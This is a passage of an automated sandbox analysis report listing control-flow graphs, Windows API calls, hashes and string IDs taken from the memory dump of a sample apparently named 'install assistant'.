                                • Instruction Fuzzy Hash: 3C717AB0208745AFD710DF55C480B9ABBF4BF8A708F20492EF498D6B51D375D859CB92
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2301045129.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true
                                • Associated: 00000006.00000002.2301019803.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2302230556.000000006CE68000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303792682.000000006D032000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID:
                                • String ID: K?Jo$K?Jo$`Rlx$7eO
                                • API String ID: 0-174837320
                                • Opcode ID: 8a5deaba0c3ba7129e0d86a780dbbd44977c0e28f6a11366706975b29ae0343c
                                • Instruction ID: e28652f87062710090df32791169d4d938b7168e2cfcb2308fa1009f2c09206f
                                • Opcode Fuzzy Hash: 8a5deaba0c3ba7129e0d86a780dbbd44977c0e28f6a11366706975b29ae0343c
                                • Instruction Fuzzy Hash: 9B4235B4A1D3418FC755CE28C090A1ABBF1AF8A318F288E1EF59587B60D734D865CB53
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2301045129.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true
                                • Associated: 00000006.00000002.2301019803.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2302230556.000000006CE68000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303792682.000000006D032000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID:
                                • String ID: ;T55
                                • API String ID: 0-2572755013
                                • Opcode ID: f5a0055250709944c30d8f2360748a8cc66607d2abaf3c1dc913cccd7ace9f9c
                                • Instruction ID: 3e1d9241b4a746f0ecfbd97b5fdd7d70a21cecb565d111d4c165948fdb32e1ff
                                • Opcode Fuzzy Hash: f5a0055250709944c30d8f2360748a8cc66607d2abaf3c1dc913cccd7ace9f9c
                                • Instruction Fuzzy Hash: 8F03E431645B018FC728CF29C8D06A5B7E3BFD532471ECA6DC0A64BA95EB74B44ACB50

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 7579 6ce44ff0-6ce45077 CreateProcessA 7580 6ce450ca-6ce450d3 7579->7580 7581 6ce450d5-6ce450da 7580->7581 7582 6ce450f0-6ce4510b 7580->7582 7583 6ce45080-6ce450c2 WaitForSingleObject CloseHandle * 2 7581->7583 7584 6ce450dc-6ce450e1 7581->7584 7582->7580 7583->7580 7584->7580 7585 6ce450e3-6ce45118 7584->7585
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2301045129.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true
                                • Associated: 00000006.00000002.2301019803.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2302230556.000000006CE68000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303792682.000000006D032000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID: D
                                • API String ID: 963392458-2746444292
                                • Opcode ID: 4fe5c406620bdce2cad996f504577e85fdf7b0303480c4b20a7b5f06c5640c26
                                • Instruction ID: 2f1bff74100a1ed2e837a9b82b8fe80d53b75b37f11250c7a3bf3c854d817586
                                • Opcode Fuzzy Hash: 4fe5c406620bdce2cad996f504577e85fdf7b0303480c4b20a7b5f06c5640c26
                                • Instruction Fuzzy Hash: 2631E37181A3808FD740DF28D19872ABBF0EB9A318F509A1DF8D996250E7759589CF43

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 7587 6ce5bc5e-6ce5bc7a 7588 6ce5bc80-6ce5bc82 7587->7588 7589 6ce5be39 7587->7589 7590 6ce5bca4-6ce5bcc5 7588->7590 7591 6ce5bc84-6ce5bc97 call 6ce4f9df call 6ce4f9cc call 6ce50120 7588->7591 7592 6ce5be3b-6ce5be3f 7589->7592 7593 6ce5bcc7-6ce5bcca 7590->7593 7594 6ce5bccc-6ce5bcd2 7590->7594 7607 6ce5bc9c-6ce5bc9f 7591->7607 7593->7594 7596 6ce5bcd4-6ce5bcd9 7593->7596 7594->7591 7594->7596 7598 6ce5bcdb-6ce5bce7 call 6ce5ac69 7596->7598 7599 6ce5bcea-6ce5bcfb call 6ce5be40 7596->7599 7598->7599 7608 6ce5bcfd-6ce5bcff 7599->7608 7609 6ce5bd3c-6ce5bd4e 7599->7609 7607->7592 7612 6ce5bd26-6ce5bd32 call 6ce5beb1 7608->7612 7613 6ce5bd01-6ce5bd09 7608->7613 7610 6ce5bd95-6ce5bdb7 WriteFile 7609->7610 7611 6ce5bd50-6ce5bd59 7609->7611 7614 6ce5bdc2 7610->7614 7615 6ce5bdb9-6ce5bdbf GetLastError 7610->7615 7617 6ce5bd85-6ce5bd93 call 6ce5c2c3 7611->7617 7618 6ce5bd5b-6ce5bd5e 7611->7618 7621 6ce5bd37-6ce5bd3a 7612->7621 7619 6ce5bd0f-6ce5bd1c call 6ce5c25b 7613->7619 7620 6ce5bdcb-6ce5bdce 7613->7620 7622 6ce5bdc5-6ce5bdca 7614->7622 7615->7614 7617->7621 7624 6ce5bd75-6ce5bd83 call 6ce5c487 7618->7624 7625 6ce5bd60-6ce5bd63 7618->7625 7629 6ce5bd1f-6ce5bd21 7619->7629 7623 6ce5bdd1-6ce5bdd6 7620->7623 7621->7629 7622->7620 7630 6ce5be34-6ce5be37 7623->7630 7631 6ce5bdd8-6ce5bddd 7623->7631 7624->7621 7625->7623 7632 6ce5bd65-6ce5bd73 call 6ce5c39e 7625->7632 7629->7622 7630->7592 7635 6ce5bddf-6ce5bde4 7631->7635 7636 6ce5be09-6ce5be15 7631->7636 7632->7621 7641 6ce5bde6-6ce5bdf8 call 6ce4f9cc call 6ce4f9df 7635->7641 7642 6ce5bdfd-6ce5be04 call 6ce4f9f2 7635->7642 7639 6ce5be17-6ce5be1a 7636->7639 7640 6ce5be1c-6ce5be2f call 6ce4f9cc call 6ce4f9df 7636->7640 7639->7589 7639->7640 7640->7607 7641->7607 7642->7607
                                APIs
                                  • Part of subcall function 6CE5BEB1: GetConsoleCP.KERNEL32(?,6CE5B0D0,?), ref: 6CE5BEF9
                                • WriteFile.KERNEL32(?,?,6CE646EC,00000000,00000000,?,00000000,00000000,6CE65AB6,00000000,00000000,?,00000000,6CE5B0D0,6CE646EC,00000000), ref: 6CE5BDAF
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,6CE646EC,6CE5B0D0,00000000,?,?,?,?,00000000,?), ref: 6CE5BDB9
                                • __dosmaperr.LIBCMT ref: 6CE5BDFE
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2301045129.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true
                                • Associated: 00000006.00000002.2301019803.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2302230556.000000006CE68000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303792682.000000006D032000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: ConsoleErrorFileLastWrite__dosmaperr
                                • String ID: 8Q
                                • API String ID: 251514795-4022487301
                                • Opcode ID: ebff09ad5e8c22a47e7b5eca3e90cf4d2ddcb5292b3c74e4407d656a7e721f2e
                                • Instruction ID: ebc772309b309e07091d4b7998230818a267bbed80d9a027ce07d4ef1262b56e
                                • Opcode Fuzzy Hash: ebff09ad5e8c22a47e7b5eca3e90cf4d2ddcb5292b3c74e4407d656a7e721f2e
                                • Instruction Fuzzy Hash: 6951E671E0020EAFDB01DFA8C840BEEBB79EF0635CFB40555E600ABB41DB76995587A1

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 7654 6ce45b90-6ce45b9c 7655 6ce45bdd 7654->7655 7656 6ce45b9e-6ce45ba9 7654->7656 7659 6ce45bdf-6ce45c57 7655->7659 7657 6ce45bbf-6ce45bcc call 6cd101f0 call 6ce50b18 7656->7657 7658 6ce45bab-6ce45bbd 7656->7658 7668 6ce45bd1-6ce45bdb 7657->7668 7658->7657 7661 6ce45c83-6ce45c89 7659->7661 7662 6ce45c59-6ce45c81 7659->7662 7662->7661 7664 6ce45c8a-6ce45d49 call 6cd12250 call 6cd12340 call 6ce49379 call 6cd0e010 call 6ce47088 7662->7664 7668->7659
                                APIs
                                • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CE45D31
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2301045129.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true
                                • Associated: 00000006.00000002.2301019803.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2302230556.000000006CE68000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303792682.000000006D032000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: Ios_base_dtorstd::ios_base::_
                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                • API String ID: 323602529-1866435925
                                • Opcode ID: 6d5cb0d2c7368df5782379839c01a8ce672a2458c667068e88e075cbd0304427
                                • Instruction ID: 3008703690e96e53ca7bfd488f79495c24ea92c387b3c96bf8497e552df65bd8
                                • Opcode Fuzzy Hash: 6d5cb0d2c7368df5782379839c01a8ce672a2458c667068e88e075cbd0304427
                                • Instruction Fuzzy Hash: 745153B5900B008FD725CF29D481B97BBF1BB49318F208A2DD8864BB91D775B909CB90

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 7699 6ce5b925-6ce5b939 call 6ce615a2 7702 6ce5b93f-6ce5b947 7699->7702 7703 6ce5b93b-6ce5b93d 7699->7703 7705 6ce5b952-6ce5b955 7702->7705 7706 6ce5b949-6ce5b950 7702->7706 7704 6ce5b98d-6ce5b9ad call 6ce6171f 7703->7704 7716 6ce5b9af-6ce5b9b9 call 6ce4f9f2 7704->7716 7717 6ce5b9bb 7704->7717 7709 6ce5b957-6ce5b95b 7705->7709 7710 6ce5b973-6ce5b983 call 6ce615a2 CloseHandle 7705->7710 7706->7705 7708 6ce5b95d-6ce5b971 call 6ce615a2 * 2 7706->7708 7708->7703 7708->7710 7709->7708 7709->7710 7710->7703 7719 6ce5b985-6ce5b98b GetLastError 7710->7719 7721 6ce5b9bd-6ce5b9c0 7716->7721 7717->7721 7719->7704
                                APIs
                                • CloseHandle.KERNEL32(00000000,?,00000000,?,6CE6425F), ref: 6CE5B97B
                                • GetLastError.KERNEL32(?,00000000,?,6CE6425F), ref: 6CE5B985
                                • __dosmaperr.LIBCMT ref: 6CE5B9B0
                                Memory Dump Source
                                • Source File: 00000006.00000002.2301045129.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true
                                • Associated: 00000006.00000002.2301019803.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2302230556.000000006CE68000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303792682.000000006D032000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: CloseErrorHandleLast__dosmaperr
                                • String ID:
                                • API String ID: 2583163307-0
                                • Opcode ID: 99dceb74c43c859d2f7035e9dc09e0fce0fc73a28b3cd1a192a03da806a585ab
                                • Instruction ID: f47a1dc9a3da38ab275fa2f6e98adab817aac49a6d25fa75c1ccac78b9c3eb0e
                                • Opcode Fuzzy Hash: 99dceb74c43c859d2f7035e9dc09e0fce0fc73a28b3cd1a192a03da806a585ab
                                • Instruction Fuzzy Hash: 94016B33E591201AC202167B98457AE77754FC3B3CFB9530DE81587FC1CB62C8558290

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 7944 6ce50b9c-6ce50ba7 7945 6ce50bbe-6ce50bcb 7944->7945 7946 6ce50ba9-6ce50bbc call 6ce4f9cc call 6ce50120 7944->7946 7948 6ce50c06-6ce50c0f call 6ce5ae75 7945->7948 7949 6ce50bcd-6ce50be2 call 6ce50cb9 call 6ce5873e call 6ce59c60 call 6ce5b898 7945->7949 7958 6ce50c10-6ce50c12 7946->7958 7948->7958 7963 6ce50be7-6ce50bec 7949->7963 7964 6ce50bf3-6ce50bf7 7963->7964 7965 6ce50bee-6ce50bf1 7963->7965 7964->7948 7966 6ce50bf9-6ce50c05 call 6ce547bb 7964->7966 7965->7948 7966->7948
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2301045129.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true
                                • Associated: 00000006.00000002.2301019803.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2302230556.000000006CE68000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303792682.000000006D032000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID:
                                • String ID: 8Q
                                • API String ID: 0-4022487301
                                • Opcode ID: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                                • Instruction ID: cf3bb6ed618165251b8f0f06ef1743c67de66651eacb63fb665c0e633529678b
                                • Opcode Fuzzy Hash: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                                • Instruction Fuzzy Hash: 13F0F4329016546AC6211A3ACC00BDB32B89F4337CFB00719F86197FD0DB77D52AC6A1
                                APIs
                                • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CE45AB4
                                • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CE45AF4
                                Memory Dump Source
                                • Source File: 00000006.00000002.2301045129.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true
                                • Associated: 00000006.00000002.2301019803.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2302230556.000000006CE68000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303792682.000000006D032000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: Ios_base_dtorstd::ios_base::_
                                • String ID:
                                • API String ID: 323602529-0
                                • Opcode ID: ec59613fa64440a54e8165f15403d919d4a60d274e4d17cab2a683bff61f6286
                                • Instruction ID: 1aeb143bf472dfed3c7dfea741b7420481416133e3073860bbfc9a8aa32ad439
                                • Opcode Fuzzy Hash: ec59613fa64440a54e8165f15403d919d4a60d274e4d17cab2a683bff61f6286
                                • Instruction Fuzzy Hash: 0A516971211B00DBE725CF25D885BD7BBF4BB04718F548A1CD5AA4BBA1DB30B549CB81
                                APIs
                                • GetLastError.KERNEL32(6CE76DD8,0000000C), ref: 6CE4EF52
                                • ExitThread.KERNEL32 ref: 6CE4EF59
                                Memory Dump Source
                                • Source File: 00000006.00000002.2301045129.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true
                                • Associated: 00000006.00000002.2301019803.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2302230556.000000006CE68000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303792682.000000006D032000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: ErrorExitLastThread
                                • String ID:
                                • API String ID: 1611280651-0
                                • Opcode ID: 6048c289a0ce4a32162ef875b5c696ecce71e6cb8053b83970a3df1e961444f1
                                • Instruction ID: 8a6a2b8291d6a3aed94543c176f1d48118068cb1858e99f1ba828fcff9eb7b22
                                • Opcode Fuzzy Hash: 6048c289a0ce4a32162ef875b5c696ecce71e6cb8053b83970a3df1e961444f1
                                • Instruction Fuzzy Hash: C9F0C2B1A00600AFDB05EBB0D809AAE7B74FF41218F34864EE00597B51CB365915CFA1
                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.2301045129.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true
                                • Associated: 00000006.00000002.2301019803.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2302230556.000000006CE68000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303792682.000000006D032000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: __wsopen_s
                                • String ID:
                                • API String ID: 3347428461-0
                                • Opcode ID: d4f005f1a1e29513219847f3439ab92a98e58241755f52a8479e13c5012fe74b
                                • Instruction ID: f9ef03d39b590b2c7248b367431f2b4ec075b02ca721fae20b527107486ae71d
                                • Opcode Fuzzy Hash: d4f005f1a1e29513219847f3439ab92a98e58241755f52a8479e13c5012fe74b
                                • Instruction Fuzzy Hash: EC113A72A0420EAFCB05DF59E945ADB7BF8EF49318F144059F805AB301D671ED21CBA4
                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.2301045129.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true
                                • Associated: 00000006.00000002.2301019803.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2302230556.000000006CE68000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303792682.000000006D032000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: _free
                                • String ID:
                                • API String ID: 269201875-0
                                • Opcode ID: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                                • Instruction ID: cc78379e435eb7b14255a66a7895672a072199f518c8463f6423af0076887102
                                • Opcode Fuzzy Hash: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                                • Instruction Fuzzy Hash: CA014472C11159BFCF41DFA98D009DE7FB5AF08314F244166FD64E2690E7318625DB91
                                APIs
                                • CreateFileW.KERNEL32(00000000,00000000,?,6CE64115,?,?,00000000,?,6CE64115,00000000,0000000C), ref: 6CE64474
                                Memory Dump Source
                                • Source File: 00000006.00000002.2301045129.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true
                                • Associated: 00000006.00000002.2301019803.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2302230556.000000006CE68000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303792682.000000006D032000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: CreateFile
                                • String ID:
                                • API String ID: 823142352-0
                                • Opcode ID: 8f0723eb614becdbf821de1a43564b1c8a28372a7fa1e74cf880d2d1f265e4f3
                                • Instruction ID: 4d4741e6000ed7325748ac68d80008a4c95c31d394ef8905625220fbcc589376
                                • Opcode Fuzzy Hash: 8f0723eb614becdbf821de1a43564b1c8a28372a7fa1e74cf880d2d1f265e4f3
                                • Instruction Fuzzy Hash: 6FD06C3210014DBBDF028E84DC06EDA3BBAFB88714F014000BA1856020C732E861EB90
                                Memory Dump Source
                                • Source File: 00000006.00000002.2301045129.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true
                                • Associated: 00000006.00000002.2301019803.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2302230556.000000006CE68000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303792682.000000006D032000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                                • Instruction ID: 5539a01c11ab0488cad495e2e049ce8ef8588404d5b87c4f101624e3fb002c5c
                                • Opcode Fuzzy Hash: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                                • Instruction Fuzzy Hash:
                                APIs
                                • __EH_prolog.LIBCMT ref: 6CED84B1
                                  • Part of subcall function 6CED993B: __EH_prolog.LIBCMT ref: 6CED9940
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CE78000, based on PE: true
                                • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID: 1$`)K$h)K
                                • API String ID: 3519838083-3935664338
                                • Opcode ID: fb81dbfa73f61bd15ec69b15b7f2714c80bc06e5f8e59c27703e0bd61042d5ed
                                • Instruction ID: 21e9fa93dea0f1779e6f7409a587775249cec193e3630985855f88cea9362afa
                                • Opcode Fuzzy Hash: fb81dbfa73f61bd15ec69b15b7f2714c80bc06e5f8e59c27703e0bd61042d5ed
                                • Instruction Fuzzy Hash: 14F28D30900258DFDB11CFA8C894BDDBBB5AF49308F354099E449AB781DB75AE86CF61
                                APIs
                                • __EH_prolog.LIBCMT ref: 6CECAEF4
                                  • Part of subcall function 6CECE622: __EH_prolog.LIBCMT ref: 6CECE627
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CE78000, based on PE: true
                                • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID: $h%K
                                • API String ID: 3519838083-1737110039
                                • Opcode ID: 17cf35b80b03fcff345a605a7a63ea6e65b0b9a8420bc989c8341716572d16e6
                                • Instruction ID: 4c7375a0e1ffc50cb41d9e2f2fd4e7b4e733541f7dbe72ca8f78107785c30abf
                                • Opcode Fuzzy Hash: 17cf35b80b03fcff345a605a7a63ea6e65b0b9a8420bc989c8341716572d16e6
                                • Instruction Fuzzy Hash: F8536A30E01258DFDB15CBA4CA94BEDBBB4AF09308F24409CD469A7791DB749E89CF52
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CE78000, based on PE: true
                                • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID: $J
                                • API String ID: 3519838083-1755042146
                                • Opcode ID: bc8a295356575513f6860aba7bf9c3ae3d8e4be31f89be339654daa28ae8d27d
